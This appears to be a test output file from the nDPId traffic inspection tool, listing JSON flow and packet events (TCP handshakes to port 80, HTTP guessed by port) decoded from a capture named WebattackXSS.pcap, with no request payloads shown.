+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347787097,"flow_last_seen":1499347787097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347787097,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1499347787097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347787097,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87ftAAD4G19SsEAABwKgKMu36AFCLoOXYAAAAAKACchD14AAAAgQFtAQCCAoBPAgjAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":2,"flow_last_seen":1499347787098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347787098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7fr\/T2fti6Dl2aAScSCyBQAAAgQFtAQCCAoD5dmXATwIIwEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":3,"flow_last_seen":1499347787098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347787098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07fxAAD4G19usEAABwKgKMu36AFCLoOXZ\/09n7oAQAOVRDQAAAQEICgE8CCMD5dmX"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347788375,"flow_last_seen":1499347788375,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347788375,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1499347788375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347788375,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8h61AAD4GPiOsEAABwKgKMu4IAFB6rY7PAAAAAKACchBckAAAAgQFtAQCCAoBPAliAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6841,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":2,"flow_last_seen":1499347788375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347788375,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7gg8gqx8eq2O0KAScSCVswAAAgQFtAQCCAoD5drXATwJYgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":3,"flow_last_seen":1499347788376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347788376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0h65AAD4GPiqsEAABwKgKMu4IAFB6rY7QPIKsfYAQAOU0uwAAAQEICgE8CWID5drX"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6852,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347789640,"flow_last_seen":1499347789640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347789640,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6852,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1499347789640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347789640,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83o1AAD4G50KsEAABwKgKMu4WAFDDudQTAAAAAKACchDM9QAAAgQFtAQCCAoBPAqeAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6853,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":2,"flow_last_seen":1499347789640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347789640,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7hacXl08w7nUFKAScSD0QAAAAgQFtAQCCAoD5dwTATwKngEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":3,"flow_last_seen":1499347789641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347789641,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03o5AAD4G50msEAABwKgKMu4WAFDDudQUnF5dPYAQAOWTRwAAAQEICgE8Cp8D5dwT"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6871,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347792291,"flow_last_seen":1499347792291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792291,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6871,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1499347792291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347792291,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GCRAAD4GraysEAABwKgKMu4wAFDmKhURAAAAAKACchBm1gAAAgQFtAQCCAoBPA01AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":2,"flow_last_seen":1499347792291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347792291,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7jDnRnKf5ioVEqAScSArPwAAAgQFtAQCCAoD5d6qATwNNQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":3,"flow_last_seen":1499347792291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347792291,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GCVAAD4GrbOsEAABwKgKMu4wAFDmKhUS50ZyoIAQAOXKRgAAAQEICgE8DTUD5d6q"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347659123,"flow_last_seen":1499347664799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347659123,"flow_last_seen":1499347664799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347660441,"flow_last_seen":1499347665799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347660441,"flow_last_seen":1499347665799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347661705,"flow_last_seen":1499347666802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347661705,"flow_last_seen":1499347666802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347664226,"flow_last_seen":1499347669803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347664226,"flow_last_seen":1499347669803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347665473,"flow_last_seen":1499347670803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347665473,"flow_last_seen":1499347670803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6882,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347793575,"flow_last_seen":1499347793575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347793575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6882,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1499347793575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347793575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86x9AAD4G2rCsEAABwKgKMu4+AFCp1uVpAAAAAKACchDRggAAAgQFtAQCCAoBPA52AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":2,"flow_last_seen":1499347793575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347793575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7j6t+bU4qdblaqAScSCLXgAAAgQFtAQCCAoD5d\/rATwOdgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":3,"flow_last_seen":1499347793576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347793576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06yBAAD4G2resEAABwKgKMu4+AFCp1uVqrfm1OYAQAOUqZgAAAQEICgE8DnYD5d\/r"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347796130,"flow_last_seen":1499347796130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347796130,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1499347796130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347796130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dkVAAD4GT4usEAABwKgKMoAQAFA7jGawAAAAAKACchAqNgAAAgQFtAQCCAoBPBD1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":2,"flow_last_seen":1499347796130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347796130,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgBCKrPedO4xmsaAScSDCewAAAgQFtAQCCAoD5eJpATwQ9QEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":3,"flow_last_seen":1499347796130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347796130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dkZAAD4GT5KsEAABwKgKMoAQAFA7jGaxiqz3noAQAOVhgwAAAQEICgE8EPUD5eJp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347797419,"flow_last_seen":1499347797419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347797419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1499347797419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347797419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tZJAAD4GED6sEAABwKgKMoAeAFBmW6elAAAAAKACchC9IQAAAgQFtAQCCAoBPBI3AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6913,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":2,"flow_last_seen":1499347797419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347797419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgB7MdTcTZlunpqAScSDS5QAAAgQFtAQCCAoD5eOsATwSNwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":3,"flow_last_seen":1499347797420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347797420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tZNAAD4GEEWsEAABwKgKMoAeAFBmW6emzHU3FIAQAOVx7QAAAQEICgE8EjcD5eOs"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347798713,"flow_last_seen":1499347798713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347798713,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1499347798713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347798713,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LWRAAD4GmGysEAABwKgKMoAsAFA\/CD4fAAAAAKACchBMqQAAAgQFtAQCCAoBPBN7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6925,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":2,"flow_last_seen":1499347798713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347798713,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgCwp5bxCPwg+IKAScSB+iwAAAgQFtAQCCAoD5eTvATwTewEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":3,"flow_last_seen":1499347798714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347798714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LWVAAD4GmHOsEAABwKgKMoAsAFA\/CD4gKeW8Q4AQAOUdkwAAAQEICgE8E3sD5eTv"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347801271,"flow_last_seen":1499347801271,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347801271,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1499347801271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347801271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZRhAAD4GYLisEAABwKgKMoBGAFBeRnDiAAAAAKACchD4DgAAAgQFtAQCCAoBPBX6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6944,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":2,"flow_last_seen":1499347801271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347801271,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgEYSjN1bXkZw46AScSAdsQAAAgQFtAQCCAoD5edvATwV+gEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":3,"flow_last_seen":1499347801271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347801271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZRlAAD4GYL+sEAABwKgKMoBGAFBeRnDjEozdXIAQAOW8uAAAAQEICgE8FfoD5edv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347802549,"flow_last_seen":1499347802549,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 